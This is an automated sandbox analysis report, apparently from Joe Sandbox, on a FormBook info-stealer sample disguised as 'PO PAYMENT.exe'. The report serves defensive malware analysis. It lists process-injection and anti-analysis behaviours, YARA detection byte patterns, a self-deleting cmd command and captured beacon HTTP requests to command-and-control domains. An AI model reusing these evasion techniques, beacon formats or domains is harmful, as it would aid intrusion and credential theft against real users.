Loading ...

Play interactive tourEdit tour

Analysis Report PO PAYMENT.exe

Overview

General Information

Sample Name:PO PAYMENT.exe
Analysis ID:299520
MD5:11b29ed0ff92f097e36f70ac86c2fc6a
SHA1:7f32e89b30bcc0c8c3c38d8eaa2a013ca3dd56e7
SHA256:f358e7685d05c3fbc7d93bd7641276df66c9587065c2643f698324b4f99da2c1
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO PAYMENT.exe (PID: 4704 cmdline: 'C:\Users\user\Desktop\PO PAYMENT.exe' MD5: 11B29ED0FF92F097E36F70AC86C2FC6A)
    • PO PAYMENT.exe (PID: 6212 cmdline: {path} MD5: 11B29ED0FF92F097E36F70AC86C2FC6A)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5712 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6456 cmdline: /c del 'C:\Users\user\Desktop\PO PAYMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO PAYMENT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO PAYMENT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO PAYMENT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.PO PAYMENT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.PO PAYMENT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO PAYMENT.exeReversingLabs: Detection: 35%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO PAYMENT.exeJoe Sandbox ML: detected
          Source: 1.2.PO PAYMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 4x nop then pop ebx1_2_00407AFA
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 4x nop then pop edi1_2_00416CA2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx5_2_00DD7AFB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi5_2_00DE6CA2

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 185.53.178.13:80 -> 192.168.2.6:49753
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.65:80 -> 192.168.2.6:49754
          Source: global trafficHTTP traffic detected: GET /t65/?Bj=lHLHKJ1PWrzp&ITlpdJj=yQFTBbedMWyGwOKDiRRIkYFp9ZOzxKlpHdYsuqtEdMvycNIoiSUE5DSoMDD6ypCOFx2Pf+vG9Q== HTTP/1.1Host: www.bestphotographyaccessories.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t65/?ITlpdJj=nm2HEmHfX7D9IUvk7dYYuraDZ4J224QDqtwcpS7fnC6ZsYfhA0Kh7m5n1GflF18RnRA50mhqNA==&Bj=lHLHKJ1PWrzp HTTP/1.1Host: www.freddyvan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t65/?Bj=lHLHKJ1PWrzp&ITlpdJj=RR7cdlzcGGD1CgyucU/iYrLCgnJFGv4C+0f5oOXcjqEcHGyNTWv4CuiM/WZXjqRjmOEsXv956w== HTTP/1.1Host: www.assetprotectionguru.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t65/?ITlpdJj=X8t833tTMXMhz+ECWQ8H4g63xvRVR3b4PK/YZLwOkYgqnjBDLD8Hz5TgbO2W76sJvb9ccrlwWQ==&Bj=lHLHKJ1PWrzp HTTP/1.1Host: www.ousticky.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /t65/?Bj=lHLHKJ1PWrzp&ITlpdJj=yQFTBbedMWyGwOKDiRRIkYFp9ZOzxKlpHdYsuqtEdMvycNIoiSUE5DSoMDD6ypCOFx2Pf+vG9Q== HTTP/1.1Host: www.bestphotographyaccessories.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t65/?ITlpdJj=nm2HEmHfX7D9IUvk7dYYuraDZ4J224QDqtwcpS7fnC6ZsYfhA0Kh7m5n1GflF18RnRA50mhqNA==&Bj=lHLHKJ1PWrzp HTTP/1.1Host: www.freddyvan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t65/?Bj=lHLHKJ1PWrzp&ITlpdJj=RR7cdlzcGGD1CgyucU/iYrLCgnJFGv4C+0f5oOXcjqEcHGyNTWv4CuiM/WZXjqRjmOEsXv956w== HTTP/1.1Host: www.assetprotectionguru.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t65/?ITlpdJj=X8t833tTMXMhz+ECWQ8H4g63xvRVR3b4PK/YZLwOkYgqnjBDLD8Hz5TgbO2W76sJvb9ccrlwWQ==&Bj=lHLHKJ1PWrzp HTTP/1.1Host: www.ousticky.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.bestphotographyaccessories.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Date: Fri, 16 Oct 2020 19:15:52 GMTConnection: closeContent-Length: 1343Data Raw: 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 66 72 65 64 64 79 76 61 6e 2e 63 6f 6d 20 2d 20 55 6e 64 65 72 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 75 63 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 76 61 72 20 5f 67 61 71 20 3d 20 5f 67 61 71 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 33 30 30 34 39 2d 35 27 5d 29 3b 0d 0a 20 20 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 44 6f 6d 61 69 6e 4e 61 6d 65 27 2c 20 27 6e 6f 6e 65 27 5d 29 3b 0d 0a 20 20 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 6c 6c 6f 77 4c 69 6e 6b 65 72 27 2c 20 74 72 75 65 5d 29 3b 0d 0a 20 20 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 74 72 61 63 6b 50 61 67 65 76 69 65 77 27 5d 29 3b 0d 0a 0d 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 67 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 20 67 61 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 20 67 61 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 67 61 2e 73 72 63 20 3d 20 28 27 68 74 74 70 73 3a 27 20 3d 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3f 20 27 68 74 74 70 73 3a 2f 2f 73 73 6c 27 20 3a 20 27 68 74 74 70 3a 2f 2f 77 77 77 27 29 20 2b 20 27 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 67 61 2e 6a 73 27 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 61 2c 20 73 29 3b 0d 0a 2
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.352476611.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO PAYMENT.exe, 00000000.00000002.348778465.0000000001280000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PO PAYMENT.exe
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419D5F NtCreateFile,1_2_00419D5F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419E5A NtClose,1_2_00419E5A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01589910
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015899A0 NtCreateSection,LdrInitializeThunk,1_2_015899A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589840 NtDelayExecution,LdrInitializeThunk,1_2_01589840
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01589860
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_015898F0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589A50 NtCreateFile,LdrInitializeThunk,1_2_01589A50
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01589A00
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589A20 NtResumeThread,LdrInitializeThunk,1_2_01589A20
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589540 NtReadFile,LdrInitializeThunk,1_2_01589540
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015895D0 NtClose,LdrInitializeThunk,1_2_015895D0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589710 NtQueryInformationToken,LdrInitializeThunk,1_2_01589710
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589780 NtMapViewOfSection,LdrInitializeThunk,1_2_01589780
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_015897A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01589660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01589660
